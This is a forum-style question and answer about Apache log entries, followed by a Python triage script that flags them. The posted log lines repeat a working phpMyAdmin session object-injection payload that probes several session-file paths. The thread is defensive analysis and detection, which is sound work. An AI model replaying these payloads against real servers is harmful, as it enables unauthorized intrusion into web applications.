Are these requests in my Apache access log malicious?

So I noticed that my Apache access log is filled with this:

180.179.206.84 - - [06/Feb/2013:14:35:45 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A46%3A%22%2Fvar%2Ftmp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:46 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A50%3A%22%2Fvar%2Flib%2Fphp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp4%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:49 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A58%3A%22%2Fvar%2Flib%2Fphp%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:51 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp4%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:54 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A53%3A%22%2Fshared%2Fsessionssess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22%2Fvar%2Fphp_sessions%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"

It doesn't look like this address is actually doing anything dangerous, but it does look like they're trying to break something. The IPs come from Italy and India, of all places. Note that the user agent is an old version of Firefox (though I know that's easy to fake). I noticed a steady stream of 20 kbit/s of inbound traffic to my personal site (which, honestly, never sees traffic). I was just curious whether anyone had an idea or any information about the specific attack they're trying to carry out here. I could ban the IPs, but there are a lot of them coming from different places, so I think that would be somewhat futile.

Any public server will see these attempts (and many, many more targeting other commonly installed software). They are automated, usually carried out from overseas / Tor / botnets, and there are enough people trying that blocking IPs is essentially pointless.

Yes, they're malicious, but no, they're not really worth getting worked up about.

They usually target old versions of things like phpMyAdmin, WordPress, Drupal, and other common tools with known vulnerabilities – keep your third-party code up to date and you should be fine.
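
An added example, not part of the original question or answer: a small triage script that parses Apache combined-format lines, percent-decodes the query string, and flags requests like the ones above that pass a `_SESSION[...]` parameter or a PHP serialized object, reporting the class name and the file paths being probed. The function names are illustrative, and the sample log lines are constructed (documentation IP ranges, placeholder token and session ID).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A PHP serialized object starts with O:<name length>:"<ClassName>":<count>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"(?P<cls>[A-Za-z_][A-Za-z0-9_]*)":\d+:\{')
# A serialized string holding an absolute path: s:<len>:"/some/path"
PHP_PATH_RE = re.compile(r's:\d+:"(?P<path>/[^"]*)"')

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["url"]).query
    # parse_qsl percent-decodes both parameter names and values
    for name, value in parse_qsl(query, keep_blank_values=True):
        obj = PHP_OBJECT_RE.search(value)
        if name.startswith("_SESSION[") or obj:
            return {
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "param": name,
                "class": obj["cls"] if obj else None,
                "paths": [p["path"] for p in PHP_PATH_RE.finditer(value)],
            }
    return None

def scan(lines):
    """Return findings for every flagged line, in input order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample input modelled on the log excerpt in the question.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2013:14:35:45 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=TOKEN&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A23%3A%22%2Fvar%2Ftmp%2Fsess_EXAMPLEID%22%3B%7D%7D HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Feb/2013:14:35:46 -0500] "GET /phpmyadmin/index.php/index.php?token=TOKEN HTTP/1.1" 200 8127 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Feb/2013:14:36:02 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Grouping the findings by `paths` shows whether a client is cycling through guessed session directories, as in the excerpt above; the logged 200 status only means the page was served, not that the injected value had any effect.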